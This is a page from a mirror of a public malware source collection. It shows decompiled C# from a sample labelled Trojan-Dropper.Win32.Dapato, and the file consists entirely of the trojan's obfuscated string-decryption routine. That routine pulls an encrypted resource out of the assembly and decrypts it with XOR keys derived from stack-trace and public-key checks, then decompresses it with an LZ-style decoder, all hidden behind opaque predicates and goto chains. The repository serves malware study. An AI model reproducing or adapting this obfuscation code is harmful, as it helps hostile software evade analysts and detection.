mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
308 lines
9.0 KiB
C#
308 lines
9.0 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type:
|
||
// Assembly: ss20, Version=1.1.1.1, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4385E1A7-2FA8-4895-8952-90E8ECDFEF6F
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5.exe
|
||
|
||
using System;
|
||
using System.Collections.Generic;
|
||
using System.Diagnostics;
|
||
using System.IO;
|
||
using System.Reflection;
|
||
using System.Runtime.CompilerServices;
|
||
using System.Text;
|
||
using System.Threading;
|
||
|
||
internal static class \u000F
|
||
{
|
||
private static readonly Dictionary<int, string> \u0002;
|
||
private static BinaryReader \u0003;
|
||
private static byte[] \u0005;
|
||
private static short \u0008;
|
||
private static int \u0006;
|
||
private static byte[] \u000E;
|
||
private static int \u000F;
|
||
|
||
static \u000F()
|
||
{
|
||
Dictionary<int, string> dictionary = new Dictionary<int, string>(17);
|
||
if (false)
|
||
return;
|
||
\u000F.\u0002 = dictionary;
|
||
}
|
||
|
||
[MethodImpl(MethodImplOptions.NoInlining)]
|
||
internal static string \u0002(int _param0)
|
||
{
|
||
Dictionary<int, string> dictionary1 = \u000F.\u0002;
|
||
if (true)
|
||
goto label_69;
|
||
label_1:
|
||
Monitor.Enter((object) dictionary1);
|
||
string str1;
|
||
Dictionary<int, string> dictionary2;
|
||
try
|
||
{
|
||
string str2;
|
||
byte[] numArray1;
|
||
for (; !\u000F.\u0002.TryGetValue(_param0, out str2); _param0 = ((int) numArray1[2] | (int) numArray1[3] << 16 | (int) numArray1[0] << 8 | (int) numArray1[1] << 24) ^ -_param0)
|
||
{
|
||
int num1;
|
||
if (\u000F.\u0003 == null)
|
||
{
|
||
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
||
if (true)
|
||
goto label_59;
|
||
label_6:
|
||
Assembly.GetCallingAssembly();
|
||
if (true)
|
||
goto label_60;
|
||
label_7:
|
||
if (true)
|
||
goto label_61;
|
||
label_8:
|
||
Assembly assembly1;
|
||
Stream manifestResourceStream = assembly1.GetManifestResourceStream(" \u200B ");
|
||
if (true)
|
||
goto label_62;
|
||
label_9:
|
||
if (true)
|
||
goto label_63;
|
||
label_10:
|
||
int num2;
|
||
StackTrace stackTrace1 = new StackTrace(num2, false);
|
||
if (true)
|
||
goto label_64;
|
||
label_11:
|
||
int num3 = \u000F.\u0006 ^ (6470 | num2);
|
||
if (true)
|
||
goto label_65;
|
||
label_12:
|
||
int num4 = num2 - 1;
|
||
if (true)
|
||
goto label_66;
|
||
label_13:
|
||
StackTrace stackTrace2;
|
||
StackFrame frame = stackTrace2.GetFrame(num2);
|
||
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
|
||
\u000F.\u0006 ^= num2 + 128;
|
||
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
|
||
if (frame == null)
|
||
\u000F.\u0006 ^= 219315;
|
||
bool flag = (object) type == (object) typeof (RuntimeMethodHandle);
|
||
\u000F.\u0006 ^= 160;
|
||
if (!flag)
|
||
{
|
||
flag = (object) type == null;
|
||
if (flag)
|
||
\u000F.\u0006 ^= 219283;
|
||
}
|
||
if (flag == (stackTrace2 != null))
|
||
\u000F.\u0006 ^= 32;
|
||
\u000F.\u0006 ^= 6502 | num2 + 1;
|
||
Stream input;
|
||
\u000F.\u0003 = new BinaryReader(input);
|
||
short count = (short) ((int) \u000F.\u0003.ReadInt16() ^ (int) (short) -~-~-~~--~~31928);
|
||
if (count == (short) 0)
|
||
\u000F.\u0008 = (short) ((int) \u000F.\u0003.ReadInt16() ^ (int) (short) -~~-~-~-~26227);
|
||
else
|
||
\u000F.\u0005 = \u000F.\u0003.ReadBytes((int) count);
|
||
Assembly assembly2 = assembly1;
|
||
AssemblyName assemblyName;
|
||
try
|
||
{
|
||
assemblyName = assembly2.GetName();
|
||
}
|
||
catch
|
||
{
|
||
assemblyName = new AssemblyName(assembly2.FullName);
|
||
}
|
||
\u000F.\u000E = assemblyName.GetPublicKeyToken();
|
||
if (\u000F.\u000E != null && \u000F.\u000E.Length == 0)
|
||
\u000F.\u000E = (byte[]) null;
|
||
num1 = -901177404 ^ (int) (uint) \u0003\u2000.\u0002() ^ -~-~-~~-~1950343116;
|
||
\u000F.\u000F = num1;
|
||
\u000F.\u0006 = \u000F.\u0006 & 268435314 ^ 6788;
|
||
goto label_30;
|
||
label_66:
|
||
num2 = num4;
|
||
goto label_13;
|
||
label_65:
|
||
\u000F.\u0006 = num3;
|
||
goto label_12;
|
||
label_64:
|
||
stackTrace2 = stackTrace1;
|
||
goto label_11;
|
||
label_63:
|
||
num2 = 1;
|
||
goto label_10;
|
||
label_62:
|
||
input = manifestResourceStream;
|
||
goto label_9;
|
||
label_61:
|
||
\u000F.\u0006 = 1610370;
|
||
goto label_8;
|
||
label_60:
|
||
goto label_7;
|
||
label_59:
|
||
assembly1 = executingAssembly;
|
||
goto label_6;
|
||
}
|
||
else
|
||
num1 = \u000F.\u000F;
|
||
label_30:
|
||
int num5 = _param0 ^ 715395926 ^ num1;
|
||
\u000F.\u0003.BaseStream.Position = (long) num5;
|
||
byte[] numArray2;
|
||
if (\u000F.\u0005 != null)
|
||
{
|
||
numArray2 = \u000F.\u0005;
|
||
}
|
||
else
|
||
{
|
||
short count = \u000F.\u0008 != (short) -1 ? \u000F.\u0008 : (short) ((int) \u000F.\u0003.ReadInt16() ^ 5418 ^ num5);
|
||
if (count == (short) 0)
|
||
{
|
||
numArray2 = (byte[]) null;
|
||
}
|
||
else
|
||
{
|
||
numArray2 = \u000F.\u0003.ReadBytes((int) count);
|
||
for (int index = 0; index != numArray2.Length; ++index)
|
||
numArray2[index] ^= (byte) (\u000F.\u000F >> ((index & 3) << 3));
|
||
}
|
||
}
|
||
int num6 = \u000F.\u0003.ReadInt32() ^ num5 ^ -~~-~--~-~~1541142888 ^ num1;
|
||
if (num6 == -2)
|
||
{
|
||
numArray1 = \u000F.\u0003.ReadBytes(4);
|
||
_param0 = -1541142888 ^ num1;
|
||
}
|
||
else
|
||
{
|
||
bool flag1 = (num6 & int.MinValue) != 0;
|
||
bool flag2 = (num6 & 1073741824) != 0;
|
||
bool flag3 = (num6 & 536870912) != 0;
|
||
int count = num6 & 536870911;
|
||
byte[] numArray3 = \u0002\u2000.\u0002(numArray2, \u000F.\u0003.ReadBytes(count));
|
||
if (\u000F.\u000E != null != (\u000F.\u0006 != 1607814))
|
||
{
|
||
for (int index = 0; index < count; ++index)
|
||
{
|
||
byte num7 = \u000F.\u000E[index & 7];
|
||
byte num8 = (byte) ((int) num7 << 3 | (int) num7 >> 5);
|
||
numArray3[index] = (byte) ((uint) numArray3[index] ^ (uint) num8);
|
||
}
|
||
}
|
||
int num9 = \u000F.\u0006 - 12;
|
||
byte[] bytes;
|
||
int length;
|
||
if (!flag2)
|
||
{
|
||
bytes = numArray3;
|
||
length = count;
|
||
}
|
||
else
|
||
{
|
||
length = (int) numArray3[2] | (int) numArray3[0] << 16 | (int) numArray3[3] << 8 | (int) numArray3[1] << 24;
|
||
bytes = new byte[length];
|
||
\u000F.\u0002(numArray3, 4, bytes);
|
||
}
|
||
string str3;
|
||
if (flag1 && num9 == 1607802)
|
||
{
|
||
char[] chArray = new char[length];
|
||
for (int index = 0; index < length; ++index)
|
||
chArray[index] = (char) bytes[index];
|
||
str3 = new string(chArray);
|
||
}
|
||
else
|
||
str3 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
|
||
int num10 = num9 + ((int) sbyte.MaxValue + (num9 & 3) << 5);
|
||
if (num10 != 1611930)
|
||
str3 = (_param0 + count ^ 936568 ^ num10 & 1293).ToString("X");
|
||
if (!flag3)
|
||
{
|
||
str3 = string.Intern(str3);
|
||
\u000F.\u0002.Add(_param0, str3);
|
||
if (\u000F.\u0002.Count == 17)
|
||
{
|
||
\u000F.\u0003.Close();
|
||
\u000F.\u0003 = (BinaryReader) null;
|
||
\u000F.\u0005 = \u000F.\u000E = (byte[]) null;
|
||
}
|
||
}
|
||
str1 = str3;
|
||
goto label_68;
|
||
}
|
||
}
|
||
string str4 = str2;
|
||
if (true)
|
||
str1 = str4;
|
||
}
|
||
finally
|
||
{
|
||
Monitor.Exit((object) dictionary2);
|
||
}
|
||
label_68:
|
||
return str1;
|
||
label_69:
|
||
dictionary2 = dictionary1;
|
||
goto label_1;
|
||
}
|
||
|
||
private static void \u0002(byte[] _param0, int _param1, byte[] _param2)
|
||
{
|
||
if (true)
|
||
goto label_14;
|
||
label_1:
|
||
if (true)
|
||
goto label_15;
|
||
label_2:
|
||
if (true)
|
||
goto label_16;
|
||
label_3:
|
||
int length = _param2.Length;
|
||
label_13:
|
||
int num1;
|
||
int num2;
|
||
int num3;
|
||
while (num3 < length)
|
||
{
|
||
if ((num1 <<= 1) == 256)
|
||
{
|
||
num1 = 1;
|
||
num2 = (int) _param0[_param1++];
|
||
}
|
||
if ((num2 & num1) != 0)
|
||
{
|
||
int num4 = ((int) _param0[_param1] >> 2) + 3;
|
||
int num5 = ((int) _param0[_param1] << 8 | (int) _param0[_param1 + 1]) & 1023;
|
||
_param1 += 2;
|
||
int num6 = num3 - num5;
|
||
if (num6 < 0)
|
||
break;
|
||
while (true)
|
||
{
|
||
if (--num4 >= 0 && num3 < length)
|
||
_param2[num3++] = _param2[num6++];
|
||
else
|
||
goto label_13;
|
||
}
|
||
}
|
||
else
|
||
_param2[num3++] = _param0[_param1++];
|
||
}
|
||
return;
|
||
label_16:
|
||
num1 = 128;
|
||
goto label_3;
|
||
label_15:
|
||
num2 = 0;
|
||
goto label_2;
|
||
label_14:
|
||
num3 = 0;
|
||
goto label_1;
|
||
}
|
||
}
|